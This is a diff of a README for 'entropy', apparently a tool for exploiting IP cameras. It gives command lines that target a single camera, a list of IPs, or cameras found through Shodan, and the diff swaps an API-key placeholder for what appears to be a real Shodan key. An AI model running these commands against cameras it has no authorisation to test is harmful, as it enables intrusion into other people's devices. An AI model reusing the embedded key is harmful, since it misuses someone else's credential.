henryharan/entropy/README.md

 # Entropy exploit examples

-> If you want to exploit a local camera, run
+> Example of the exploiting a single camera

     entropy -b 1 -i 192.168.1.100:80 -v

-> If you want to exploit cameras from list, run
+> Example of the exploiting cameras from a file

     entropy -b 2 -l iplist.txt -v

-> If you want to exploit cameras from database, run
+> Example of the exploiting cameras using shodan

-    entropy -b 2 -v --shodan <API key>
+    entropy -b 2 -v --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

 # Terms of use